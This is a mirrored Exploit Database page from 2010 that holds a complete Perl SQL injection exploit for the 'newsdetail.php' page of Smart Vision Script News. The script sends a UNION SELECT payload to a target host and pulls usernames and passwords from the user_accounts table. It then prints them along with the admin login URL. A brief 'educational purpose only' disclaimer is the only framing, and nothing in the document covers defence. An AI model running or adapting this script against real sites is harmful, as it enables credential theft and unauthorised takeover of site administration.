Smart Vision Script News – ‘newsdetail.php’ SQL Injection (2)

• Exploit Database
• 160 阅读

• 作者： darkmasking
  日期： 2010-01-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/10981/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125

  #!usr/bin/perl ############################################################################ # Exploit Title: Smart Vision Script News (newsdetail) SQL Injection Exploit # Date: 01-04-2010 # Author: darkmasking ############################################################################ # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! ############################################################################ # Vuln discovered by Err0R # Smart Vision Script News ( newsdetail ) SQL Injection Vulnerability # http://www.exploit-db.com/exploits/10977 ############################################################################ # Greetz : sorry bro lom ada teman jadi tuk diri sendiri aja 0_o ############################################################################ use IO::Socket::INET; use LWP::UserAgent; sub banner { print "\n". "[»]=============================================[_][-][X]\n". "[»]======= ------d-------m------ ======== [»]\n". "[»]|| === = | |(o o)| |||== || ==|| [»]\n". "[»]|| === = ||(~)|||| == || [»]\n". "[»]======= | |||| [»]\n". "[»]---------------------------------------------------[»]\n". "[»] Smart Vision Script News (newsdetail) [»]\n". "[»] SQL Injection Exploit [»]\n". "[»] by darkmasking[»]\n". "[»] Vuln discovered by Err0R[»]\n". "[»]===================================================[»]\n\n"; } my $host= $ARGV[0]; my $sql_path = "/newsdetail.php?id="; my $admin_path ="/admin/admin.php"; if (@ARGV < 1) { &banner(); &help("-1"); } elsif(check($host) == 1) { &banner(); &dmploit($host,$sql_path); } else { &banner(); help("-2"); } sub dmploit() { my $host = $_[0]; my $sql_path = $_[1]; print "[+] Getting Username and Password\n"; print "[!] Checking...\n"; print "\n"; my $sql_atk = $host.$sql_path."-9999 union select null,concat(0x6461726b6d61736b696e67,0x3a,user_name,0x3a,password,0x3a,0x6461726b6d61736b696e67),null,null,null,null,null from zagrosle_zagros.user_accounts--"; my $sql_get = get_url($sql_atk); my $connect = tag($sql_get); if($connect =~ /darkmasking:(.+):(.+):darkmasking/) { print "-o0 SQL Injection Successfully 0o-\n"; print "[+] Username : $1\n"; print "[+] Password : $2\n"; print "\n"; print "[+] Admin URL = $host$admin_path\n"; } else { print "[-] SQL Injection Failed\n"; } } sub get_url() { $link = $_[0]; my $req = HTTP::Request->new(GET => $link); my $ua = LWP::UserAgent->new(); $ua->timeout(5); my $response = $ua->request($req); return $response->content; } sub tag() { my $string = $_[0]; $string =~ s/ /\$/g; $string =~ s/\s/\*/g; return($string); } sub check() { my $host= $_[0]; if ($host =~ /http:\/\/(.*)/) { return 1; } else { return 0; } } sub help() { my $error = $_[0]; if ($error == -1) { print "\n[-] Error, missed some arguments !\n\n"; } elsif ($error == -2) { print "\n[-] Error, Bad arguments !\n"; } print " Usage : perl $0 http://www.darkurl.com/\n\n"; print " Ex: perl $0 http://www.darkurl.com/\n\n"; exit(0); }